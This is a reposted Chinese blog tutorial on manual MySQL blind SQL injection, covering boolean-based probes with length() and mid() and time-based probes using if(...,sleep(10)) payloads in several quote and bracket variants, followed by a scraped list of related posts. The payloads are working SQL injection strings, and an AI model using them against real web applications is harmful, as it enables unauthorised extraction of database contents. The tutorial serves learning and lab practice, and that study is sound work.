十几分钟让你学会MySQL布尔和延迟盲注手工操作
作者:Max老白Gān丶
链接:http://www.lofter.com/lpost/1fefbc76_12d25dc31
来源:LOFTER
- 注入常用到的几个函数
- 1
mid(str,1,3)字符串获取

这里我们要看到123456789 从第一个字节也就是1开始获取到3就截止了 - 1
ORD()转换为ASCII码

我们看到这里把a转换成了97 我们去看对照表
- 1
Length()统计字节长度

- 1
version()查看数据库版本

- 1
database()查看数据库

- 1
user()查看当前用户

首先我们确定注入了验证要先获取数据库长度
|
1
2
|
’and length(database()) ’or length(database()) |
我们先看一下数据库中sqltest长度【其实就是7个】
小知识点:有数据用and 没数据用or
|
1
|
|
|
1
|
’and length(database()) >1 #: |
意思是数据库的长度是否大于1
没有变化以此类推
发现变换
这时候我们要确定他到底是多少字节
|
1
|
|
他等于8吗?不等于
他等于6吗?不等于
他等于7返回正确页面说明他的字节是7

现在我们获取数据库名字:
|
1
|
|
|
1
|
mid(database(),1,1) ='1' |
:它的意思是从第一个获取每次只取一个 它等于1吗?
很显然不等
然后修改后面的以此类推我们试到
|
1
|
|
返回true的正确页面
如果我们想获取第二位第三位怎么办?
|
1
2
3
4
5
6
7
|
mid(database(),2,1) mid(database(),3,1) mid(database(),4,1)mid(database(),5,1)mid(database(),6,1)mid(database(),7,1) |
剩下的我就不一一获取了学习这样方式就明白了。
延时注入方法:
常用的判断语句:
|
1
2
3
4
5
6
7
8
9
|
' and if(1=0,1, sleep(10)) --+ " and if(1=0,1, sleep(10)) --+) and if(1=0,1, sleep(10)) --+') and if(1=0,1, sleep(10)) --+") and if(1=0,1, sleep(10)) --+ |
为什么我和布尔注入写在一个文章里面哪?因为他们操作的流程是差不多的。
延时了10秒确定存在注入。
获取数据库长度利用上面的知识:
|
1
|
'and if(length(database())=9,sleep(10),1)--+ |
意思是如果数据过长度等于9他就延时10秒
|
1
|
'and if(length(database())<6,sleep(10),1)--+ |
如果一开始不知道他长度可以用这个大致判断的长度然后用上面的等于确定
长度小于6吗?没有延迟不小于6

小于9吗?
延迟成功表名数据库小于9 也就是说数据库长度在6-9之间
|
1
|
'and if(length(database())=7,sleep(10),1)--+ |
一 一测试我们确定长度是7
获取数据库名字:
|
1
|
|

十几分钟让你学会MySQL布尔和延迟盲注手工操作的更多相关文章
- mysql基于“时间”的盲注
无需页面报错,根据页面响应时间做判断! mysql基于时间的盲注 =================================================================== ...
- DVWA-基于布尔值的盲注与基于时间的盲注学习笔记
DVWA-基于布尔值的盲注与基于时间的盲注学习笔记 基于布尔值的盲注 一.DVWA分析 将DVWA的级别设置为low 1.分析源码,可以看到对参数没有做任何过滤,但对sql语句查询的返回的结果做了改变 ...
- Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)
Day41 login3(SKCTF)
- MYSQL注入天书之盲注讲解
Background-2 盲注的讲解 何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面.此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注.从ba ...
- [MYSQL手工注入](2)基于布尔的SQL盲注实战
0x02 MYSQL 手工注入实战--基于布尔的SQL盲注 前言,之前有对MYSQL基于报错的手工注入进行过介绍,但今天的实验环境,并不是基于报错的SQL注入,而是一个基于布尔的SQL盲注测试流程. ...
- 盲注----基于布尔的SQL盲注
构造逻辑判断常用字符串截取函数http://www.cnblogs.com/yyccww/p/6054569.html常用函数left(a,b) 从左侧截取a的前b位right(a,b) 从右侧截 ...
- Sqli-LABS通关笔录-5[SQL布尔型盲注]
/* 请为原作者打个标记.出自:珍惜少年时 */ 通过该关卡的学习我掌握到了 1.如何灵活的运用mysql里的MID.ASCII.length.等函数 2.布尔型盲注的认识 3.哦,对了还有.程序 ...
- 半天做完的数据报表,YonBuilder只要十几分钟,0代码开发
进入数字化时代,拍脑袋的决策方式显然不靠谱,一切要靠数据说话.与信息化时代相比,数字化时代的企业对数据的应用更广泛.更深入.为了应对激烈的市场竞争,企业经营决策者们对数据的依赖度越来越高,企业各个业务 ...
- 【转载】一个小时学会MySQL数据库
一个小时学会MySQL数据库 目录 一.数据库概要 1.1.发展历史 1.1.1.人工处理阶段 1.1.2.文件系统 1.1.3.数据库管理系统 1.2.常见数据库技术品牌.服务与架构 1.3.数 ...
随机推荐
- linux 磁盘io监控
我们在线上linux服务器排查问题时,一般会通过top.free.netstat.df -h等命令排查cpu.内存.网络和磁盘等问题.有的时候我们需要更进一步了解磁盘io的使用情况,那么本文就是重点讲 ...
- JS一直是单线程,异步(定时器,ajax请求等)是由浏览器来实现的!(转)
原文地址:https://www.cnblogs.com/woodyblog/p/6061671.html 1.自己画的一张示意图 2.DOM一变化,界面就立刻重新渲染,效率必然很低,所以浏览器的机制 ...
- 3D 散点图的绘制
一般情况下,我们用到最多的是axes3d() 中的axes3d.Axes3D()类,AxesD() 类下面存在散点图,线性图,柱状图,曲线图等各种制图方式. 采用matplotlib 生成散点图. 一 ...
- PADS Layout VX.2.3 设置测量精度
操作系统:Windows 10 x64 工具1:PADS Layout VX.2.3 Pin #7.#8的实际距离是0.65mm,但是测量的结果却是0.7mm.为什么呢?这是由于测量精度的设置不恰当造 ...
- 2018年冬季寒假作业4--PTA 抓老鼠啊~亏了还是赚了?
1. 实验代码; #include<stdio.h> ; void search(char a,int *p){ if(a=='X'){ ) *p=; ; printf("U&q ...
- ***CodeIgniter框架集成支付宝即时到账支付SDK
本文为CI集成支付宝即时到账支付接口 1.下载支付宝官方demo ;即时到账交易接口(create_direct_pay_by_user)(DEMO下载) 原文地址:https://doc.open. ...
- 3DMath
线与面相交的计算 https://zh.wikipedia.org/wiki/%E7%BA%BF%E9%9D%A2%E4%BA%A4%E7%82%B9 什么是参数方程? 参数是参变数的简称.它是研究运 ...
- 《ServerSuperIO Designer IDE使用教程》-2.与硬件网关数据交互,并进行数据级联转发,直到云端。发布:v4.2.1版本
v4.2.1 更新内容:1.重新定义数据转发文本协议,使网关与ServerSuperIO以及之间能够相关交互数据.2.扩展ServerSuperIO动态数据类的方法,更灵活.3.修复Designer增 ...
- 南京邮电大学//bugkuCTF部分writeup
WEB 1.签到题 nctf{flag_admiaanaaaaaaaaaaa} 右键查看源代码或按f12即可. 2.这题不是web nctf{photo_can_also_hid3_msg} 下载图片 ...
- Linux学习之文件系统权限及表示
三类人 用户主(user:u):文件的所有者 同组人(group:g):与文件主同组的用户 其他人(other:o):除用户主和同组人外的其他所有人 三种权限 读权限(r):指用户对文件或目录的读许可 ...